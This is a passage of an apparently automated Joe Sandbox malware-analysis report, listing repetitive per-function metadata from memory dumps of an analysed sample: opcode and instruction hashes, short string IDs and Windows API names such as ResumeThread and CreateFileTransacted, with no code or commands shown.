                                                  • Instruction ID: 8d2cbaf69c670ca0ed97fd42b11369e5fb8e528207c5993ea6a54a06a0e9a6a5
                                                  • Opcode Fuzzy Hash: e55114d714575057e408849addae090ffaffc7b06ec11480e6b8755fb340cc23
                                                  • Instruction Fuzzy Hash: 1B31E57191DA498FFB5DD728A8226B877E2EF66310F544279D05FC71C2E91CA90983C1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2524664462.00007FFAACA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACA80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaaca80000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: r6$r6
                                                  • API String ID: 0-2018302956
                                                  • Opcode ID: 8d116587cc2e86226e5f16ee3daf1e4b5a5045f1143a752c271d32c62cadc238
                                                  • Instruction ID: 5d3e495f611dcbeb8aa7d1cca0bec7eb3042e11111e46f47a429a03fc96238f9
                                                  • Opcode Fuzzy Hash: 8d116587cc2e86226e5f16ee3daf1e4b5a5045f1143a752c271d32c62cadc238
                                                  • Instruction Fuzzy Hash: E1318031A18A4ACFE748EB5C9491AB8B7A2EF59350B50C179D01EC3285EB24FC168BC0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2524664462.00007FFAACA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACA80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaaca80000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: r6$r6
                                                  • API String ID: 0-2018302956
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2517322419.00007FFAAC4F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaac4f0000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID: CreateFileTransacted
                                                  • String ID:
                                                  • API String ID: 2149338676-0
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2517322419.00007FFAAC4F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaac4f0000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2517322419.00007FFAAC4F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaac4f0000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID: FileWrite
                                                  • String ID:
                                                  • API String ID: 3934441357-0
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2517322419.00007FFAAC4F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaac4f0000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID: InfoSystem
                                                  • String ID:
                                                  • API String ID: 31276548-0
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2517322419.00007FFAAC4F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaac4f0000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID: ResumeThread
                                                  • String ID:
                                                  • API String ID: 947044025-0
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2517322419.00007FFAAC4F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaac4f0000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID: InfoSystem
                                                  • String ID:
                                                  • API String ID: 31276548-0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2519212074.00007FFAAC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaac6c0000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: /
                                                  • API String ID: 0-1686368129
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2524664462.00007FFAACA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACA80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaaca80000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: /
                                                  • API String ID: 0-1686368129
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2519212074.00007FFAAC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaac6c0000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: /
                                                  • API String ID: 0-1686368129
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2519212074.00007FFAAC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaac6c0000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (3
                                                  • API String ID: 0-3558171836
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2519212074.00007FFAAC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaac6c0000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (3
                                                  • API String ID: 0-3558171836
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2517322419.00007FFAAC4F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaac4f0000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID: AllocVirtual
                                                  • String ID:
                                                  • API String ID: 4275171209-0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2524664462.00007FFAACA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACA80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaaca80000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: /
                                                  • API String ID: 0-1686368129
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2519212074.00007FFAAC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaac6c0000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: r6
                                                  • API String ID: 0-2984296541
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2519212074.00007FFAAC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaac6c0000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: b4
                                                  • API String ID: 0-3371602342
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2519212074.00007FFAAC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaac6c0000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: b4
                                                  • API String ID: 0-3371602342
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2524664462.00007FFAACA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACA80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaaca80000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: b4
                                                  • API String ID: 0-3371602342
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2524664462.00007FFAACA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACA80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaaca80000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: r6
                                                  • API String ID: 0-2984296541
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2524664462.00007FFAACA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACA80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaaca80000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: r6
                                                  • API String ID: 0-2984296541
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2519212074.00007FFAAC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaac6c0000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: r6
                                                  • API String ID: 0-2984296541
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2519212074.00007FFAAC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaac6c0000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: r6
                                                  • API String ID: 0-2984296541
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2519212074.00007FFAAC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaac6c0000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: r6
                                                  • API String ID: 0-2984296541
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2524664462.00007FFAACA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACA80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaaca80000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: r6
                                                  • API String ID: 0-2984296541
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2519212074.00007FFAAC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaac6c0000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: r6
                                                  • API String ID: 0-2984296541
                                                  • Opcode ID: aa9043dd52c30e5240c7d923b6d59d54263e52eee52f9ba65e64ccd2fc14363c
                                                  • Instruction ID: 003d34f84a47bd076cbdac7423fc9d4c4dc966d91ca591a28a1a8dd86792eee9
                                                  • Opcode Fuzzy Hash: aa9043dd52c30e5240c7d923b6d59d54263e52eee52f9ba65e64ccd2fc14363c
                                                  • Instruction Fuzzy Hash: D8213D70E195099FEB9ADB58D455ABDB7B1FF59310F0051BED00FE3292CE34A9458B80
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2524664462.00007FFAACA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACA80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaaca80000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: r6
                                                  • API String ID: 0-2984296541
                                                  • Opcode ID: 4a0034453be28a8cdfe2e21c6edc346a9dd0878968a1429e7588eb24619946b7
                                                  • Instruction ID: 5d71906d324e6667e9257b0d64163bf5434c223cd3c48c96b09248cebfd88824
                                                  • Opcode Fuzzy Hash: 4a0034453be28a8cdfe2e21c6edc346a9dd0878968a1429e7588eb24619946b7
                                                  • Instruction Fuzzy Hash: DDD0C292E1E2818FF72A037408621B82E91CF273407445BB6C28F4A1D3E8096D089391
                                                  • Instruction Fuzzy Hash: 4971C862D4EA96DFF753E778E4615E93FA0EF02318B1891B7D04EC7293DD29A4098390
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2519212074.00007FFAAC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaac6c0000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4211ccefcb104381c2971b1be207ef92b11ceb5c4a086cfd62f179c10ef4f5fe
                                                  • Instruction ID: 88d9e7998498615fe8002b518f7b1f6ddb153db43c5c9cb2d3716e82115d2f61
                                                  • Opcode Fuzzy Hash: 4211ccefcb104381c2971b1be207ef92b11ceb5c4a086cfd62f179c10ef4f5fe
                                                  • Instruction Fuzzy Hash: 2C81BE3091EB46CFE36BDB14D19457177A1FF06300B64B57DC0AE87A92CA29F84ACB91
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2519212074.00007FFAAC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaac6c0000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 44ce871b350a82d28889326c2a7bfa91a67a1fa9f0e9d6c184bafe5d99a5dca8
                                                  • Instruction ID: 210ceca145dd8e08e60f4ca3bbf743c69b354a6ecb4d4d1c731fc800fc7c367b
                                                  • Opcode Fuzzy Hash: 44ce871b350a82d28889326c2a7bfa91a67a1fa9f0e9d6c184bafe5d99a5dca8
                                                  • Instruction Fuzzy Hash: 2851343060EB498FE75BCB2898815707BE0EF5632471852BEC08EC71A3D929F84BC785
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2524664462.00007FFAACA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACA80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaaca80000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6b2587527c05744d2f65608f552b315438c13ab595294eb72a185d9f8c4ce090
                                                  • Instruction ID: 254043af54f265bd99a01deea51fbe2e926b7180d366710dd82336691bcbab03
                                                  • Opcode Fuzzy Hash: 6b2587527c05744d2f65608f552b315438c13ab595294eb72a185d9f8c4ce090
                                                  • Instruction Fuzzy Hash: F781A23152AB06CFE369DB54E08557177E2FF06308B5085BDC09F87A92EA29F9468B81
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2519212074.00007FFAAC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaac6c0000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 594e244725029ebfd7eaf928f396e919a44c7b3f997401d02e5c2c0276694d55
                                                  • Instruction ID: ab065242d58da322752146d3a52c30b755e7e1346f0009f684052896c7296e3a
                                                  • Opcode Fuzzy Hash: 594e244725029ebfd7eaf928f396e919a44c7b3f997401d02e5c2c0276694d55
                                                  • Instruction Fuzzy Hash: 6F516B7490995D8FDF85EFA8D895AEDBBB1FF59300F1051AAD00DE7252CB34A881CB80
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2519212074.00007FFAAC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaac6c0000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0b30e559032f0b3f05296fc63f8b9fa30c491d3e1052915caee535a0b06a759b
                                                  • Instruction ID: 8be3f0b52e14b4fb421a64944c2ef73458e7e58d634d58d960f2c3ae7de5ad3b
                                                  • Opcode Fuzzy Hash: 0b30e559032f0b3f05296fc63f8b9fa30c491d3e1052915caee535a0b06a759b
                                                  • Instruction Fuzzy Hash: 8051AE3091E546CBEB1FCF18C4A06B17BA1FF96310B14A5B9D45E8B58BDE28E445C781
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2519212074.00007FFAAC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaac6c0000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b4c329470076dc1501780e4ab8b25f7e96f4fc7004bf9d782b2d74c9d77f9e41
                                                  • Instruction ID: 768bc7ca6925ee8c1eb37f9809d8f2b0d1cff24138c9bbd20f0b215f9ead0371
                                                  • Opcode Fuzzy Hash: b4c329470076dc1501780e4ab8b25f7e96f4fc7004bf9d782b2d74c9d77f9e41
                                                  • Instruction Fuzzy Hash: 9351913090EA49CFFB96DF18D851BB97BE0EF56310F1460BBE40DC71A1DA24A809C791
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2524664462.00007FFAACA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACA80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaaca80000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e991a1f8db785b73b73aa2e148b28ee23f3fb82239fb7ac4e12bf64e5c790527
                                                  • Instruction ID: b68a1163bb4c4156113b30abea426724ec71c4f450ab5c69eb7807b0de4653b6
                                                  • Opcode Fuzzy Hash: e991a1f8db785b73b73aa2e148b28ee23f3fb82239fb7ac4e12bf64e5c790527
                                                  • Instruction Fuzzy Hash: DF41C5B1A2E7468BF36C5B18684507577D2EF67750B24863ED48FC3192E918E90A43C6
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2519212074.00007FFAAC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaac6c0000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 48bb0310d86611a60030fda6382a5a98dcf5ef6984a65e04f1a4a45be2663264
                                                  • Instruction ID: 85ee36a2b04b228ce3eb2453544e3a275c68341f23af022fa4f7b84c75e639f0
                                                  • Opcode Fuzzy Hash: 48bb0310d86611a60030fda6382a5a98dcf5ef6984a65e04f1a4a45be2663264
                                                  • Instruction Fuzzy Hash: 0F419171D0EA8ACFFB47DB68D4616EC7BB0EF06314F146077D04ED7292DA29A8098790
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2524664462.00007FFAACA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACA80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaaca80000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: edcdce35640564e816c76a99dada6a6e77102ff530dde9c36ef93af8a03abc5a
                                                  • Instruction ID: a7811ada418996cb5c4772bfbf4198283967210be4dc5407ac57eed4161ff0bb
                                                  • Opcode Fuzzy Hash: edcdce35640564e816c76a99dada6a6e77102ff530dde9c36ef93af8a03abc5a
                                                  • Instruction Fuzzy Hash: 23319573D1EAA69BFB02AB7CA8B14F97BE1EF02214B048172D45EC6293FD15950D43E1
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2519212074.00007FFAAC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaac6c0000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: eed2769244a4e15273665935ce2c0fc582f2b726ef697c8d7a8f6b701d5a5a33
                                                  • Instruction ID: 3936ed5850dd085ee2b7aaee65423f43fb7410cd4786b7ecf5c61d516c3aad2b
                                                  • Opcode Fuzzy Hash: eed2769244a4e15273665935ce2c0fc582f2b726ef697c8d7a8f6b701d5a5a33
                                                  • Instruction Fuzzy Hash: 98413032A0C9488FDB89EF5CC496DB4B7E1FF6932070455AAE04FC3596DE24E849CB81
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2524664462.00007FFAACA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACA80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaaca80000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: cb03ccea7f2271ea7b623e5f1c4bcd0131438cccb94551dd1194fa6f81653b5c
                                                  • Instruction ID: 4cb9d112394631c85fa4816d7b1aafddd9eb1ffae305d80d602a5a27c519ccf6
                                                  • Opcode Fuzzy Hash: cb03ccea7f2271ea7b623e5f1c4bcd0131438cccb94551dd1194fa6f81653b5c
                                                  • Instruction Fuzzy Hash: A541623161CE48CFEF88EB18D455EB5B7E1FB6932470441AAD04EC3196DE34E945CB81
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2524664462.00007FFAACA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACA80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaaca80000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e37bdf44fd0319d57118bd9c07c02fed58a02a3339c02a5356f7f0e31892c5c7
                                                  • Instruction ID: 80f3a5ca687294a05934127d126d663c1b8e704df332f6e70261a4cacb492437
                                                  • Opcode Fuzzy Hash: e37bdf44fd0319d57118bd9c07c02fed58a02a3339c02a5356f7f0e31892c5c7
                                                  • Instruction Fuzzy Hash: 6441823261C948CFDF88EB28D496EB477E1FB6A314B1441A9D04FC3292DE35E845CB81
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2519212074.00007FFAAC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaac6c0000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 12638f927a8619ef562269622e1d8bce44811fef049658fe201eb91ebab60350
                                                  • Instruction ID: c950f0484e44aa4d61874cb80ee70975542eedcfbabd50d514bda024be92989d
                                                  • Opcode Fuzzy Hash: 12638f927a8619ef562269622e1d8bce44811fef049658fe201eb91ebab60350
                                                  • Instruction Fuzzy Hash: 05419F3160C948CFDF89EB28D4A59A5B7F1FB69320B0442AAD01FD3696CE24E845CB91
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2519212074.00007FFAAC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaac6c0000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 41b218be92c400d3b4b0dadb28ee2a0d5dfba54143a9db77b5f53a769a1cf9d7
                                                  • Instruction ID: 48b59471d7075eb488a146ed7a3c8307f95bcda7ac5b25c14caa24743d179c19
                                                  • Opcode Fuzzy Hash: 41b218be92c400d3b4b0dadb28ee2a0d5dfba54143a9db77b5f53a769a1cf9d7
                                                  • Instruction Fuzzy Hash: C2313F31A1CA488FDB99EF2CC495DB4B7E1FB6931070446AAE05FC7596CE24E885CB81
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2524664462.00007FFAACA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACA80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaaca80000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5fb800d021fab9aeaa03a2656d8d10e0807023046e354ecf945f3731397b1644
                                                  • Instruction ID: bf04f7dec0deb0e5e0a5c001e69520d7d8d4cfb774cf377305116a43f62399e1
                                                  • Opcode Fuzzy Hash: 5fb800d021fab9aeaa03a2656d8d10e0807023046e354ecf945f3731397b1644
                                                  • Instruction Fuzzy Hash: 59318F31618E48CFEB8CEB28C455EB5B7E2FB6A31470442AAD05EC7196DE34E845CB81
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2524664462.00007FFAACA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACA80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaaca80000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7d3bbe1e13d68cd0e010400f52e77e7de7ff1f7d28d7cba6fcd6c54d41900b51
                                                  • Instruction ID: d29ecb8f3c5ae360a195e150551cdbfd86994eb7e7e61d654125bf56a3f28244
                                                  • Opcode Fuzzy Hash: 7d3bbe1e13d68cd0e010400f52e77e7de7ff1f7d28d7cba6fcd6c54d41900b51
                                                  • Instruction Fuzzy Hash: 7E317E3261CA488FDB88EB28C095E7477E1FBAA31471441ADD04FC7296DE28E845CB82
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2519212074.00007FFAAC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaac6c0000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 34420c5ba80e20e1aa3dc3680391f0bcc0d98f67b534bdfcde6d916527092514
                                                  • Instruction ID: 2f4df8d9f33a3ccf472b37f8948fc9e10d134bba01da6bcc84f4465ae0b4a0fa
                                                  • Opcode Fuzzy Hash: 34420c5ba80e20e1aa3dc3680391f0bcc0d98f67b534bdfcde6d916527092514
